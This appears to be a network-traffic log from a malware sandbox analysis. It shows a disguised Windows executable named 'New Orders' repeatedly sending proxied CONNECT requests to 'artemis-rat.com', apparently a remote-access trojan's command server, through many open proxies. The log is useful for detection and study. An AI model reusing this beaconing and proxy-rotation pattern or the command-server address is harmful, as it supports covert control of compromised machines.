                                                                                        Mar 11, 2024 16:16:48.188272953 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1717192.168.2.954958158.255.215.5090057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.825871944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.135385036 CET339INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/4.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 5
                                                                                        X-Squid-Error: TCP_RESET 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from proxy.wakoopa.com
                                                                                        Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 72 65 73 65 74
                                                                                        Data Ascii: reset


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1718192.168.2.9549683.9.71.16731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.826165915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.121077061 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1719192.168.2.9504358.218.100.12080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.843461990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1720192.168.2.95496347.243.114.19281807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.843811035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1721192.168.2.953512207.244.241.165537187672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.844244957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.944942951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.945486069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.039119959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:12.132571936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:24.132843018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:36.132608891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:00.132570982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:48.163799047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1722192.168.2.955023104.16.108.204807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.844430923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.998908997 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1723192.168.2.954812117.160.250.138807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.844733953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070267916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.976639032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773464918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.218482018 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:55 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                        Mar 11, 2024 16:16:58.303446054 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:55 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1724192.168.2.95349545.65.65.1841457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.872373104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1725192.168.2.954948103.216.49.23380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.873830080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1726192.168.2.954982148.72.215.230443877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.876667976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.632836103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1727192.168.2.95500641.128.148.7619767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.877024889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.664035082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773575068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.773585081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.773566961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.773346901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.773487091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.773082018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.663842916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1728192.168.2.953342122.8.149.7780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.901341915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.945115089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.945489883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.039130926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:12.132913113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:24.132745981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:36.132586002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:00.132567883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:48.165359974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1729192.168.2.954545188.166.28.8831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.264707088 CET131INHTTP/1.1 503 Too many open connections
                                                                                        Content-Type: text/plain
                                                                                        Connection: close
                                                                                        Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                        Data Ascii: Maximum number of open connections reached.
                                                                                        Mar 11, 2024 16:16:51.629692078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1730192.168.2.955044185.162.228.128807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.920552969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.074903965 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:50 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1731192.168.2.955021104.129.206.6588007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.933748960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.137176037 CET125INHTTP/1.1 407 Unauthorized
                                                                                        Server: Zscaler/6.2
                                                                                        Cache-control: no-cache
                                                                                        Content-Length: 0
                                                                                        Proxy-Authenticate: Negotiate


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1732192.168.2.955011103.166.141.74200747672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.934118032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1733192.168.2.953601132.148.245.247603497672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.936731100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.945224047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.945628881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.945570946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.038729906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
